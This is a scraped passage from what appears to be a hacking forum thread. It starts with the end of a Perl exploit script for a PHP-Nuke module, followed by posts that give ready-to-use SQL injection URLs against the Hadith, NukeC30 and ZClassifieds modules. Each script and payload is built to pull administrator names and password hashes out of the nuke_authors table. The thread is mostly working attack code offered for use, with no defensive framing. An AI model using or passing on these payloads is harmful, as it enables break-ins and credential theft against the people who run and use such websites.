    #:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
    #:-------------------------------------------------------:#
    :#|                    USAGE:                           |#:
    :#| exploit.pl -h [Hostname] -p [Path] -U [User_Id]     |#:
    #:-------------------------------------------------------:#
    #:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
    #:-------------------------------------------------------:#
    :#|                   EXAMPLE:                          |#:
    :#|  exploit.pl -h http://site.com -p /php-nuke/ -U 1   |#:
    #:-------------------------------------------------------:#
    #:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
    
    
    ");
    }
    sub problem{
        print "\n\n[~] SITO NON VULNERABILE [~]\n\n";
        exit();
    }
    sub exploitation{
        
        $conn = LWP::UserAgent -> new;
        $conn->agent('Checkbot/0.4 ');
        $query_pwd =
    $host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";
        $return_pwd = $conn->get($query_pwd) || problem();
        $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();
        print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";
       }
    
    getopts(":h:p:U:",\%args);
         $host = $args{h} if (defined $args{h});
         $path = $args{p} if (defined $args{p});
         $user_id= $args{U}if (defined $args{U});
         
         if (!defined $args{h} || !defined $args{p} || !defined $args{U}){
            usg();
         }
         else{
            exploitation();
         }
    Bug found by Lovebug
    Exploit coded by r080cy90r from RBT-4
     
    1 person likes this.
  18. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    PHP-Nuke SQL injection Module "Hadith" [cat]

    SQL Injection

    Exploit:
    Code:
    modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
    
    modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A 
    
    Found by Lovebug [rbt-4]
     
  19. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    PHP-Nuke Module NukeC30 sql injection

    SQL Injection

    Vulnerable: Version 3.0

    Exploit:
    Code:
    http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=-1/**/union/**/select/**/concat(aid,0x3a,pwd),
    2/**/from/**/nuke_authors/*where%20admin%20-2
    
    Found by HouSSaMix from H-T Team
     
  20. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    PHP-Nuke Module ZClassifieds [cat] SQL Injection

    SQL Injection

    Vulnerable: Module ZClassifieds

    Exploit:

    Code:
    modules.php?name=ZClassifieds&cat=-9999999/**/union/**/select/**/pwd,
    aid/**/from/**/nuke_authors/*where%20admin1/**
    
    ...thx Lovebug...